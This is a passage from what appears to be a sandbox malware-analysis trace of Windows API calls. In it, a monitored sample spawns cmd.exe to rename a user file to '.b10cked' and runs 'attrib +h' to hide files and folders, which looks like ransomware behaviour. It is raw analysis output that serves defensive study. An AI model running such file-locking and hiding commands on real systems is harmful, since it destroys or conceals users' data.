lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.174] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.174] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.174] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.174] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile 
(in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 
[0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, 
lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.178] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, 
lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.251] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.251] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0193.255] _close (_FileHandle=3) returned 0 [0193.255] GetConsoleTitleW (in: lpConsoleTitle=0x30f628, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.255] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.255] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0193.255] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.255] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.256] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.256] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0193.256] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0193.256] GetConsoleTitleW (in: lpConsoleTitle=0x30f3bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.256] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f244, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f30c | out: lpAttributeList=0x30f244, lpSize=0x30f30c) returned 1 [0193.256] UpdateProcThreadAttribute (in: lpAttributeList=0x30f244, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f304, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f244, lpPreviousValue=0x0) returned 1 [0193.256] GetStartupInfoW (in: lpStartupInfo=0x30f200 | out: lpStartupInfo=0x30f200*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0193.256] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0193.256] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f2a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f2ec | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", lpProcessInformation=0x30f2ec*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb58, dwThreadId=0xe60)) returned 1 [0193.258] CloseHandle (hObject=0x50) returned 1 [0193.258] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0193.258] GetEnvironmentStringsW () returned 0x4d2d50* [0193.258] FreeEnvironmentStringsW (penv=0x4d2d50) returned 1 [0193.258] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0193.327] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f1e0 | out: lpExitCode=0x30f1e0*=0x0) returned 1 [0193.327] CloseHandle (hObject=0x4c) returned 1 [0193.327] _vsnwprintf (in: _Buffer=0x30f328, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f1ec | out: _Buffer="00000000") returned 8 [0193.327] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0193.328] GetEnvironmentStringsW () returned 0x4d2d50* [0193.328] FreeEnvironmentStringsW 
(penv=0x4d2d50) returned 1 [0193.328] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.328] GetEnvironmentStringsW () returned 0x4d2d50* [0193.328] FreeEnvironmentStringsW (penv=0x4d2d50) returned 1 [0193.328] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f244 | out: lpAttributeList=0x30f244) [0193.328] GetConsoleTitleW (in: lpConsoleTitle=0x30f628, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.328] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.328] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0193.328] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.328] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.329] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.329] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0193.329] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0193.329] GetConsoleTitleW (in: lpConsoleTitle=0x30f3bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.329] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f244, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f30c | out: lpAttributeList=0x30f244, lpSize=0x30f30c) returned 1 [0193.329] UpdateProcThreadAttribute (in: lpAttributeList=0x30f244, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f304, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f244, lpPreviousValue=0x0) returned 1 [0193.329] GetStartupInfoW (in: lpStartupInfo=0x30f200 | out: lpStartupInfo=0x30f200*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", 
dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0193.329] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0193.329] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f2a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f2ec | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", lpProcessInformation=0x30f2ec*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe0c, dwThreadId=0xd7c)) returned 1 [0193.330] CloseHandle (hObject=0x4c) returned 1 [0193.330] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0193.330] GetEnvironmentStringsW () returned 0x4d3790* [0193.331] FreeEnvironmentStringsW (penv=0x4d3790) returned 1 [0193.331] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0193.366] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f1e0 | out: lpExitCode=0x30f1e0*=0x0) returned 1 [0193.366] CloseHandle (hObject=0x50) returned 1 [0193.366] _vsnwprintf (in: _Buffer=0x30f328, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f1ec | out: _Buffer="00000000") returned 8 [0193.366] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0193.366] GetEnvironmentStringsW () returned 0x4d3790* [0193.366] 
FreeEnvironmentStringsW (penv=0x4d3790) returned 1 [0193.366] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.366] GetEnvironmentStringsW () returned 0x4d3790* [0193.366] FreeEnvironmentStringsW (penv=0x4d3790) returned 1 [0193.366] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f244 | out: lpAttributeList=0x30f244) [0193.366] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.366] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.367] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.367] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.367] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.367] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.367] SetConsoleInputExeNameW () returned 0x1 [0193.367] GetConsoleOutputCP () returned 0x1b5 [0193.367] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.367] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.367] exit (_Code=0) Process: id = "437" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xaa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 
28293 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28294 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28295 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28296 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28297 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28298 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28299 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28300 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28301 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 28302 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28334 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28335 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000020000" filename = "" Region: id = 28336 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28337 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 28338 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 28339 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28340 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28341 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28342 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28343 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28344 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28345 start_va = 0x76d70000 end_va = 0x76e0cfff 
entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28346 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28347 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28348 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 28349 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28350 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28351 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28352 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 28353 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28354 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28355 start_va = 0x550000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 28356 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 28357 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Thread: id = 626 os_tid = 0xb2c [0192.781] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fbac | out: lpSystemTimeAsFileTime=0x26fbac*(dwLowDateTime=0xa7c8ea80, dwHighDateTime=0x1d440a9)) [0192.781] GetCurrentProcessId () returned 0xaa4 [0192.781] GetCurrentThreadId () returned 0xb2c [0192.781] GetTickCount () returned 0x36cd5 [0192.781] QueryPerformanceCounter (in: lpPerformanceCount=0x26fba4 | out: lpPerformanceCount=0x26fba4*=24957060224) returned 1 [0192.782] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0192.782] __set_app_type (_Type=0x1) [0192.782] __p__fmode () returned 0x76b331f4 [0192.782] __p__commode () returned 0x76b331fc [0192.782] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0192.782] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0192.782] GetCurrentThreadId () returned 0xb2c [0192.782] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb2c) returned 0x38 [0192.782] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.783] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0192.783] SetThreadUILanguage (LangId=0x0) returned 